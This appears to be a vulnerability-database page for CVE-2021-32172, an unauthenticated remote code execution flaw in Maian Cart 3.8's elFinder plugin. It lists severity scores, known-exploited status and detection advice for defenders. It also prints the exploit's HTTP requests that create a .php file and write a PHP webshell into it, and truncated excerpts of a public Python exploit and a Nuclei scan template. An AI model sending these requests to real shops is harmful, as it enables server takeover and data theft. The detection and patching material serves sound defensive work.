CVE-2021-32172
published 2021-10-07CVE-2021-32172: Maian Cart v3.8 contains a preauthorization remote code execution (RCE) exploit via a broken access control issue in the Elfinder plugin.
PriorityP189critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
66.43%
99.2th percentile
Maian Cart v3.8 contains a preauthorization remote code execution (RCE) exploit via a broken access control issue in the Elfinder plugin.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| maianscriptworld | maian_cart | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandGET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1
commandcmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e
- →Detect unauthenticated GET requests to the elFinder endpoint with cmd=mkfile creating a .php file in the target=l1_Lw (root) directory — this is the first stage of the RCE exploit chain.
- →Detect unauthenticated POST requests to /admin/index.php?p=ajax-ops&op=elfinder with cmd=put in the body, which writes a PHP webshell payload (URL-encoded <?php system($_GET["cmd"]) ?>) to the newly created file. ↗
- →Detect GET requests to /product-downloads/*.php — the exploit drops a webshell into this publicly accessible directory and executes it via HTTP GET with a ?cmd= parameter. ↗
- →Alert on the presence of any .php file created under the product-downloads/ directory, as this path is not intended to serve executable PHP scripts.
- →The exploit uses X-Requested-With: XMLHttpRequest header in the POST write stage; correlate unauthenticated requests bearing this header to the elfinder op endpoint as a detection signal. ↗
- →The exploit cleanup step issues a GET to /admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets[]=<hash> — monitor for unauthenticated rm commands on the elfinder endpoint as evidence of post-exploitation cleanup. ↗
- →The full exploit chain requires exactly 3 unauthenticated HTTP requests (mkfile GET → put POST → shell GET); a sequence of these three request patterns from the same source IP is a high-confidence indicator of exploitation.
- ·The elFinder endpoint is accessible without authentication (broken access control, CWE-862), meaning no session cookie or credential is required to trigger the exploit — authentication-based controls alone will not block this attack path. ↗
- ·The webshell is written to /product-downloads/ which is a publicly web-accessible directory; WAF rules should block PHP execution in this path in addition to blocking the write operation.
- ·The EPSS score is 0.65463 (98.494th percentile), indicating this vulnerability is actively exploited in the wild and should be treated as high-priority for detection and patching.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-p6pf-mpv2-5j87: Maian Cart v3
ghsa_unreviewed·2022-05-24
CVE-2021-32172 [CRITICAL] CWE-862 GHSA-p6pf-mpv2-5j87: Maian Cart v3
Maian Cart v3.8 contains a preauthorization remote code execution (RCE) exploit via a broken access control issue in the Elfinder plugin.
VulnCheck
maianscriptworld maian_cart Missing Authorization
vulncheck·2021·CVSS 9.8
CVE-2021-32172 [CRITICAL] maianscriptworld maian_cart Missing Authorization
maianscriptworld maian_cart Missing Authorization
Maian Cart v3.8 contains a preauthorization remote code execution (RCE) exploit via a broken access control issue in the Elfinder plugin.
Affected: maianscriptworld maian_cart
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
No detection rules found.
Exploit-DB
Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
exploitdb·2021-10-08·CVSS 9.8
CVE-2021-32172 [CRITICAL] Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
---
# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 27.11.2020 19:35
# Tested on: Ubuntu 20.04 LTS
# Exploit Author(s): DreyAnd, purpl3
# Software Link: https://www.maiancart.com/download.html
# Vendor homepage: https://www.maianscriptworld.co.uk/
# Version: Maian Cart 3.8
# CVE: CVE-2021-32172
#!/usr/bin/python3
import argparse
import requests
from bs4 import BeautifulSoup
import sys
import json
import time
parser = argparse.ArgumentParser()
parser.add_argument("host", help="Host to exploit (with http/https prefix)")
parser.add_argument("dir", help="default=/ , starting directory of the
maian-cart instance, sometimes is placed at /cart or /maiancart")
args = parser.parse_args()
#ar
Nuclei
Maian Cart <=3.8 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2021-32172 [CRITICAL] Maian Cart <=3.8 - Remote Code Execution
Maian Cart =3.8) to mitigate this vulnerability.
reference:
- https://dreyand.github.io/maian-cart-rce/
- https://github.com/DreyAnd/maian-cart-rce
- https://www.maianscriptworld.co.uk/critical-updates
- https://nvd.nist.gov/vuln/detail/CVE-2021-32172
- https://www.maianscriptworld.co.uk/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-32172
cwe-id: CWE-862
epss-score: 0.65463
epss-percentile: 0.98494
cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: maianscriptworld
product: maian_cart
tags: cve2021,cve,rce,unauth,maian,intrusive,maianscriptworld,vkev,vuln
http:
- raw:
- |
GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1
Host: {{Hostname
http://packetstormsecurity.com/files/164445/Maian-Cart-3.8-Remote-Code-Execution.htmlhttps://dreyand.github.io/maian-cart-rce/https://github.com/DreyAnd/maian-cart-rcehttps://www.maianscriptworld.co.uk/http://packetstormsecurity.com/files/164445/Maian-Cart-3.8-Remote-Code-Execution.htmlhttps://dreyand.github.io/maian-cart-rce/https://github.com/DreyAnd/maian-cart-rcehttps://www.maianscriptworld.co.uk/
2021-10-07
Published
Exploited in the wild